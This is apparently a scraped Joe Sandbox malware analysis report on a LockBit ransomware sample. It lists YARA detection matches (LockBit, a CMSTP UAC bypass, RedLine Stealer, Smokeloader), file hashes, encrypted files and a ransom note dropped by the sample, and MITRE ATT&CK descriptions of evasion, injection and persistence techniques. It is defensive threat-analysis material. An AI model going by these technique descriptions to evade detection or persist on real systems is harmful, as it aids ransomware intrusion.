0000001A.00000003.345995509.00000000049C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: MAL_EXE_LockBit_v2, Description: Detection for LockBit version 2.x from 2011, Source: 0000001A.00000002.347999899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Silas Cutler, modified by Florian Roth Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000001A.00000002.347999899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Florian Roth (Nextron Systems) Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001A.00000002.347999899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 0000001A.00000002.347999899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001A.00000002.347999899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Lockbit_89e64044, Description: unknown, Source: 0000001A.00000002.347999899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: unknown Rule: Windows_Ransomware_Lockbit_a1c60939, Description: unknown, Source: 0000001A.00000002.347999899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: unknown Rule: MAL_EXE_LockBit_v2, Description: Detection for LockBit version 2.x from 2011, Source: 0000001A.00000002.350329472.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Author: Silas Cutler, modified by Florian Roth Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001A.00000002.350329472.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 0000001A.00000002.350329472.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Lockbit_89e64044, Description: unknown, Source: 0000001A.00000002.350329472.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Ransomware_Lockbit_a1c60939, Description: unknown, Source: 0000001A.00000002.350329472.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000001A.00000002.350329472.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Target ID:	34
Start time:	06:35:47
Start date:	12/03/2023
Path:	C:\Users\user\Desktop\Pna3t7DeL3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Pna3t7DeL3.exe"
Imagebase:	0x400000
File size:	567808 bytes
MD5 hash:	523190C8ADB9F67F54BD299C9175D4E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000022.00000002.371381797.0000000002C0C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: MAL_EXE_LockBit_v2, Description: Detection for LockBit version 2.x from 2011, Source: 00000022.00000003.369188083.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, Author: Silas Cutler, modified by Florian Roth Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000022.00000003.369188083.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000022.00000003.369188083.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000022.00000003.369188083.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000022.00000003.369188083.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Lockbit_89e64044, Description: unknown, Source: 00000022.00000003.369188083.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Ransomware_Lockbit_a1c60939, Description: unknown, Source: 00000022.00000003.369188083.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: MAL_EXE_LockBit_v2, Description: Detection for LockBit version 2.x from 2011, Source: 00000022.00000002.372121153.0000000004910000.00000040.00001000.00020000.00000000.sdmp, Author: Silas Cutler, modified by Florian Roth Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000022.00000002.372121153.0000000004910000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000022.00000002.372121153.0000000004910000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Lockbit_89e64044, Description: unknown, Source: 00000022.00000002.372121153.0000000004910000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Ransomware_Lockbit_a1c60939, Description: unknown, Source: 00000022.00000002.372121153.0000000004910000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000022.00000002.372121153.0000000004910000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: MAL_EXE_LockBit_v2, Description: Detection for LockBit version 2.x from 2011, Source: 00000022.00000002.370637475.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Silas Cutler, modified by Florian Roth Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000022.00000002.370637475.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Florian Roth (Nextron Systems) Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000022.00000002.370637475.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000022.00000002.370637475.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000022.00000002.370637475.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Lockbit_89e64044, Description: unknown, Source: 00000022.00000002.370637475.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: unknown Rule: Windows_Ransomware_Lockbit_a1c60939, Description: unknown, Source: 00000022.00000002.370637475.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: unknown
Reputation:	low

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Pna3t7DeL3.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lockbit

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Operating System Destruction

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

Spam, unwanted Advertisements and Ransom Demands

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\$RECYCLE.BIN\S-1-5-21-3853321935-2125563209-4053062332-1002\desktop.ini

C:\$RECYCLE.BIN\desktop.ini

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\1494870c-9912-c184-4cc9-b401-a53f4d8de290.pdf.lockbit

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Restore-My-Files.txt

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\appcenter_r.aapp.lockbit

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\certificates_r.aapp.lockbit

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\collectsignatures.aapp.lockbit

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\combine_r_rhp.aapp.lockbit

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\comments.aapp.lockbit

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\compare_r_rhp.aapp.lockbit

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\cpdf_full.aapp.lockbit

Windows Analysis Report
Pna3t7DeL3.exe

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
Tactics:	Discovery
Data Sources:	Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre